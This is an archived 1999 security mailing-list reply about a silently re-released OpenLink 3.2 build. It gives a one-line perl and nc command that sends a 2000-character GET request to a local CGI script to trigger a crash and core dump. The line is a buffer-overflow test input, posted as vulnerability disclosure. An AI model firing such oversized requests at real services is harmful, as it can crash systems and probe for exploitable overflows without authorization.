Re: OpenLine 3.2 Advisory

From: Tymm Twillman (tymmat_private)
Date: Mon Oct 18 1999 - 09:58:48 PDT

Next message: .rain.forest.puppy.: "Re: Update to ODBC/RDS vulnerabilities (fwd)"

Previous message: Aleph One: "Microsoft Security Bulletin (MS99-043)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Apparently to complicate issues, OpenLink Software has released a new
"version" of their product, but hasn't updated the version number.  There
is also, as far as I can tell, nothing on their website informing users of
this change.  Even the filenames are the same; I'm told there are
numerous changes however.

Anyhow, the newer version doesn't have quite the same problem... but
ulimit -c unlimited, run oplrqb and try

perl -e 'print "GET /cgi-bin/testcono?".("A"x2000). "HTTP/1.0\n\n"' | nc
localhost 8000

and look for the core... *sigh*.

-Tymm

Next message: .rain.forest.puppy.: "Re: Update to ODBC/RDS vulnerabilities (fwd)"
Previous message: Aleph One: "Microsoft Security Bulletin (MS99-043)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:50 PDT